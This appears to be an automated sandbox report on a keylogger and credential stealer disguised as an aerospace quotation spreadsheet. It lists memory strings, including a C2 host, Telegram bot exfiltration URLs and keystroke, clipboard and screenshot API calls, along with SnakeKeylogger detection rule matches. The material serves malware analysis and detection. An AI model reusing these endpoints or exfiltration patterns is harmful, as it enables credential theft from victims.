                  Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enpv
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.000000000287B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/pv
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49725 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001FEAFF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_001FED6A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001FEAFF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_001EAA57
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00219576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00219576

                  System Summary

                  barindex
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_84e6e452-3
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_abb4bc93-0
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6b2541d0-e
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3ef44b15-8
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_001ED5EB
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001E1201
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001EE8F6
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0018BF400_2_0018BF40
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001F20460_2_001F2046
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001880600_2_00188060
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001E82980_2_001E8298
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001BE4FF0_2_001BE4FF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001B676B0_2_001B676B
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_002148730_2_00214873
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001ACAA00_2_001ACAA0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0018CAF00_2_0018CAF0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0019CC390_2_0019CC39
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001B6DD90_2_001B6DD9
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0019B1190_2_0019B119
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001891C00_2_001891C0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A13940_2_001A1394
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A17060_2_001A1706
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A781B0_2_001A781B
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001879200_2_00187920
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0019997D0_2_0019997D
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A19B00_2_001A19B0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A7A4A0_2_001A7A4A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A1C770_2_001A1C77
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A7CA70_2_001A7CA7
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0020BE440_2_0020BE44
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001B9EEE0_2_001B9EEE
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_001A1F320_2_001A1F32
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_018A1DB80_2_018A1DB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4A0882_2_00D4A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4C1472_2_00D4C147
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4D2782_2_00D4D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D453622_2_00D45362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4C4682_2_00D4C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4C7382_2_00D4C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4E9882_2_00D4E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D469A02_2_00D469A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4CA082_2_00D4CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4CCD82_2_00D4CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D46FC82_2_00D46FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4CFAB2_2_00D4CFAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4F6312_2_00D4F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D429EC2_2_00D429EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D439ED2_2_00D439ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4E97B2_2_00D4E97B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D4FA882_2_00D4FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D43AA12_2_00D43AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00D43E092_2_00D43E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E95482_2_050E9548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_050E9C702_2_050E9C70
